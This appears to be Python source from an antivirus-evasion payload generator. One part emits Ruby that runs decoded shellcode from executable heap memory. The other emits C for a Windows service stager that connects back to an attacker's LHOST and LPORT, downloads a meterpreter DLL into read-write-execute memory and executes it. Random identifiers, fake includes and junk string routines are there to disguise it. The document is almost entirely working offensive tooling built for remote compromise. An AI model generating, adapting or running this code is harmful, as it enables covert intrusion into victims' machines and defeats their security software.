payload_code += heapcreate_random + " = API.new('HeapCreate', 'III', 'I');" + heapalloc_random + " = API.new('HeapAlloc', 'III', 'I');" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I')\n"
payload_code += payloadName + " = [\"" + Shellcode + "\".unpack(\"m\")[0].delete(\"\\\\\\\\x\")].pack(\"H*\")\n"
payload_code += heap_name + " = " + heapcreate_random + ".call(0x0004,(" + payloadName + ".length > 0x1000 ? " + payloadName + ".length : 0x1000), 0)\n"
payload_code += ptrName + " = " + heapalloc_random + ".call(" + heap_name + ", 0x00000008, " + payloadName + ".length)\n"
payload_code += "x = " + rtlmove_random + ".call(" + ptrName + "," + payloadName + "," + payloadName + ".length); " + threadName + " = " + createthread_random + ".call(0,0," + ptrName + ",0,0,0); x = " + waitfor_random + ".call(" + threadName + ",0xFFFFFFF)\n"
# Close out all the if statements
for iteration in range(num_ends_required):
payload_code += 'end\n'
self.payload_source_code = payload_code
return
def generate(self):
winsock_init_name = evasion_helpers.randomString()
punt_name = evasion_helpers.randomString()
recv_all_name = evasion_helpers.randomString()
wsconnect_name = evasion_helpers.randomString()
# the real includes needed
includes = [ "#include <stdio.h>" , "#include <stdlib.h>", "#include <windows.h>", "#include <string.h>"]
# max length string for obfuscation
global_max_string_length = 10000
max_string_length = random.randint(100,global_max_string_length)
max_num_strings = 10000
# TODO: add in more string processing functions
randName1 = evasion_helpers.randomString() # reverse()
randName2 = evasion_helpers.randomString() # doubles characters
stringModFunctions = [ (randName1, "char* %s(const char *t) { int length= strlen(t); int i; char* t2 = (char*)malloc((length+1) * sizeof(char)); for(i=0;i<length;i++) { t2[(length-1)-i]=t[i]; } t2[length] = '\\0'; return t2; }" %(randName1)),
(randName2, "char* %s(char* s){ char *result = malloc(strlen(s)*2+1); int i; for (i=0; i<strlen(s)*2+1; i++){ result[i] = s[i/2]; result[i+1]=s[i/2];} result[i] = '\\0'; return result; }" %(randName2))
]
random.shuffle(stringModFunctions)
# obsufcation - "logical nop" string generation functions
randString1 = evasion_helpers.randomString(50)
randName1 = evasion_helpers.randomString()
randVar1 = evasion_helpers.randomString()
randName2 = evasion_helpers.randomString()
randVar2 = evasion_helpers.randomString()
randVar3 = evasion_helpers.randomString()
randName3 = evasion_helpers.randomString()
randVar4 = evasion_helpers.randomString()
randVar5 = evasion_helpers.randomString()
stringGenFunctions = [ (randName1, "char* %s(){ char *%s = %s(\"%s\"); return strstr( %s, \"%s\" );}" %(randName1, randVar1, stringModFunctions[0][0], randString1, randVar1, randString1[25])),
(randName2, "char* %s(){ char %s[%s], %s[%s/2]; strcpy(%s,\"%s\"); strcpy(%s,\"%s\"); return %s(strcat( %s, %s)); }" % (randName2, randVar2, max_string_length, randVar3, max_string_length, randVar2, evasion_helpers.randomString(50), randVar3, evasion_helpers.randomString(50), stringModFunctions[1][0], randVar2, randVar3)),
(randName3, "char* %s() { char %s[%s] = \"%s\"; char *%s = strupr(%s); return strlwr(%s); }" % (randName3, randVar4, max_string_length, evasion_helpers.randomString(50), randVar5, randVar4, randVar5))
]
random.shuffle(stringGenFunctions)
# obfuscation - add in our fake includes
fake_includes = ["#include <sys/timeb.h>", "#include <time.h>", "#include <math.h>", "#include <signal.h>", "#include <stdarg.h>",
"#include <limits.h>", "#include <assert.h>"]
for x in range(1, random.randint(1,7)):
includes.append(fake_includes[x])
# obsufcation - shuffle up our real and fake includes
random.shuffle(includes)
code = "#define _WIN32_WINNT 0x0500\n"
code += "#include <winsock2.h>\n"
code += "\n".join(includes) + "\n"
# real - service related headers (check the stub)
hStatusName = evasion_helpers.randomString()
serviceHeaders = ["SERVICE_STATUS ServiceStatus;","SERVICE_STATUS_HANDLE %s;" %(hStatusName), "void ServiceMain(int argc, char** argv);", "void ControlHandler(DWORD request);"]
random.shuffle(serviceHeaders)
code += "\n".join(serviceHeaders)
# obsufcation - string mod functions
code += stringModFunctions[0][1] + "\n"
code += stringModFunctions[1][1] + "\n"
# real - build the winsock_init function
wVersionRequested_name = evasion_helpers.randomString()
wsaData_name = evasion_helpers.randomString()
code += "void %s() {" % (winsock_init_name)
code += "WORD %s = MAKEWORD(%s, %s); WSADATA %s;" % (wVersionRequested_name, evasion_helpers.obfuscateNum(2,4),evasion_helpers.obfuscateNum(2,4), wsaData_name)
code += "if (WSAStartup(%s, &%s) < 0) { WSACleanup(); exit(1);}}\n" %(wVersionRequested_name,wsaData_name)
# first logical nop string function
code += stringGenFunctions[0][1] + "\n"
# real - build punt function
my_socket_name = evasion_helpers.randomString()
code += "void %s(SOCKET %s) {" %(punt_name, my_socket_name)
code += "closesocket(%s);" %(my_socket_name)
code += "WSACleanup();"
code += "exit(1);}\n"
# obsufcation - second logical nop string function
code += stringGenFunctions[1][1] + "\n"
# real - build recv_all function
my_socket_name = evasion_helpers.randomString()
buffer_name = evasion_helpers.randomString()
len_name = evasion_helpers.randomString()
code += "int %s(SOCKET %s, void * %s, int %s){" %(recv_all_name, my_socket_name, buffer_name, len_name)
code += "int slfkmklsDSA=0;int rcAmwSVM=0;"
code += "void * startb = %s;" %(buffer_name)
code += "while (rcAmwSVM < %s) {" %(len_name)
code += "slfkmklsDSA = recv(%s, (char *)startb, %s - rcAmwSVM, 0);" %(my_socket_name, len_name)
code += "startb += slfkmklsDSA; rcAmwSVM += slfkmklsDSA;"
code += "if (slfkmklsDSA == SOCKET_ERROR) %s(%s);} return rcAmwSVM; }\n" %(punt_name, my_socket_name)
# obsufcation - third logical nop string function
code += stringGenFunctions[2][1] + "\n"
# real - build wsconnect function
target_name = evasion_helpers.randomString()
sock_name = evasion_helpers.randomString()
my_socket_name = evasion_helpers.randomString()
code += "SOCKET %s() { struct hostent * %s; struct sockaddr_in %s; SOCKET %s;" % (wsconnect_name, target_name, sock_name, my_socket_name)
code += "%s = socket(AF_INET, SOCK_STREAM, 0);" %(my_socket_name)
code += "if (%s == INVALID_SOCKET) %s(%s);" %(my_socket_name, punt_name, my_socket_name);
code += "%s = gethostbyname(\"%s\");" %(target_name, self.required_options["LHOST"][0])
code += "if (%s == NULL) %s(%s);" %(target_name, punt_name, my_socket_name)
code += "memcpy(&%s.sin_addr.s_addr, %s->h_addr, %s->h_length);" %(sock_name, target_name, target_name)
code += "%s.sin_family = AF_INET;" %(sock_name)
code += "%s.sin_port = htons(%s);" %(sock_name, evasion_helpers.obfuscateNum(int(self.required_options["LPORT"][0]),32))
code += "if ( connect(%s, (struct sockaddr *)&%s, sizeof(%s)) ) %s(%s);" %(my_socket_name, sock_name, sock_name, punt_name, my_socket_name)
code += "return %s;}\n" %(my_socket_name)
# real - main() method for the service code
serviceName = evasion_helpers.randomString()
code += "void main() { SERVICE_TABLE_ENTRY ServiceTable[2];"
serviceTableEntries = [ "ServiceTable[0].lpServiceName = \"%s\";" %(serviceName),
"ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;",
"ServiceTable[1].lpServiceName = NULL;",
"ServiceTable[1].lpServiceProc = NULL;"]
random.shuffle(serviceTableEntries)
code += "\n".join(serviceTableEntries)
code += "StartServiceCtrlDispatcher(ServiceTable);}\n"
# real - service status options for us to shuffle
serviceStatusOptions = ["ServiceStatus.dwWin32ExitCode = 0;",
"ServiceStatus.dwCurrentState = SERVICE_START_PENDING;",
"ServiceStatus.dwWaitHint = 0;",
"ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;",
"ServiceStatus.dwServiceSpecificExitCode = 0;",
"ServiceStatus.dwCheckPoint = 0;",
"ServiceStatus.dwServiceType = SERVICE_WIN32;"]
random.shuffle(serviceStatusOptions)
# real - serviceMain() code
code += "void ServiceMain(int argc, char** argv) {\n"
code += "\n".join(serviceStatusOptions)
code += "%s = RegisterServiceCtrlHandler( \"%s\", (LPHANDLER_FUNCTION)ControlHandler);" %(hStatusName, serviceName)
code += "if (%s == (SERVICE_STATUS_HANDLE)0) return;" %(hStatusName)
code += "ServiceStatus.dwCurrentState = SERVICE_RUNNING;"
code += "SetServiceStatus (%s, &ServiceStatus);" %(hStatusName)
code += "while (ServiceStatus.dwCurrentState == SERVICE_RUNNING) {\n"
# obsufcation - random variable names
size_name = evasion_helpers.randomString()
buffer_name = evasion_helpers.randomString()
function_name = evasion_helpers.randomString()
my_socket_name = evasion_helpers.randomString()
count_name = evasion_helpers.randomString()
# obsufcation - necessary declarations
char_array_name_1 = evasion_helpers.randomString()
number_of_strings_1 = random.randint(1,max_num_strings)
char_array_name_2 = evasion_helpers.randomString()
number_of_strings_2 = random.randint(1,max_num_strings)
char_array_name_3 = evasion_helpers.randomString()
number_of_strings_3 = random.randint(1,max_num_strings)
# real - necessary declarations
code += "ULONG32 %s;" %(size_name)
code += "char * %s;" %(buffer_name)
code += "int i;"
code += "char* %s[%s];" % (char_array_name_1, number_of_strings_1)
code += "void (*%s)();" %(function_name)
# obsufcation - malloc our first string obfuscation array
code += "for (i = 0; i < %s; ++i) %s[i] = malloc (%s);" %(number_of_strings_1, char_array_name_1, random.randint(max_string_length,global_max_string_length))
code += "%s();" %(winsock_init_name)
code += "char* %s[%s];" % (char_array_name_2, number_of_strings_2)
code += "SOCKET %s = %s();" %(my_socket_name,wsconnect_name)
# obsufcation - malloc our second string obfuscation array
code += "for (i = 0; i < %s; ++i) %s[i] = malloc (%s);" %(number_of_strings_2, char_array_name_2, random.randint(max_string_length,global_max_string_length))
# real - receive the 4 byte size from the handler
code += "int %s = recv(%s, (char *)&%s, %s, 0);" % (count_name, my_socket_name, size_name, evasion_helpers.obfuscateNum(4,2))
# real - punt the socket if something goes wrong
code += "if (%s != %s || %s <= 0) %s(%s);" %(count_name, evasion_helpers.obfuscateNum(4,2), size_name, punt_name, my_socket_name)
# real - virtual alloc space for the meterpreter .dll
code += "%s = VirtualAlloc(0, %s + %s, MEM_COMMIT, PAGE_EXECUTE_READWRITE);" %(buffer_name, size_name, evasion_helpers.obfuscateNum(5,2))
# obsufcation - declare space for our 3 string obfuscation array
code += "char* %s[%s];" % (char_array_name_3, number_of_strings_3)
# obsufcation - first string obfuscation method
code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_1, char_array_name_1, stringGenFunctions[0][0])
# real - check if the buffer received is null, if so punt the socket
code += "if (%s == NULL) %s(%s);" %(buffer_name, punt_name, my_socket_name)
# real - prepend some buffer magic to push the socket number onto the stack
code += "%s[0] = 0xBF;" %(buffer_name)
# real- copy the 4 magic bytes into the buffer
code += "memcpy(%s + 1, &%s, %s);" %(buffer_name, my_socket_name, evasion_helpers.obfuscateNum(4,2))
# obsufcation - malloc our third string obfuscation array
code += "for (i = 0; i < %s; ++i) %s[i] = malloc (%s);" %(number_of_strings_3, char_array_name_3, random.randint(max_string_length,global_max_string_length))
# obsufcation - second string obfuscation method
code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_2, char_array_name_2, stringGenFunctions[1][0])
# real - receive all data from the socket
code += "%s = %s(%s, %s + %s, %s);" %(count_name, recv_all_name, my_socket_name, buffer_name, evasion_helpers.obfuscateNum(5,2), size_name)
code += "%s = (void (*)())%s;" %(function_name, buffer_name)
code += "%s();" %(function_name)
# obsufcation - third string obfuscation method (never called)
code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_3, char_array_name_3, stringGenFunctions[2][0])
code += "} return; }\n"
# service control handler code
code += """void ControlHandler(DWORD request)
{
switch(request)
{
case SERVICE_CONTROL_STOP:
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
SetServiceStatus (%s, &ServiceStatus);
return;
case SERVICE_CONTROL_SHUTDOWN:
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
SetServiceStatus (%s, &ServiceStatus);
return;
default:
break;
}
SetServiceStatus (%s, &ServiceStatus);
return;
}
""" %(hStatusName, hStatusName, hStatusName)
self.payload_source_code = code
return
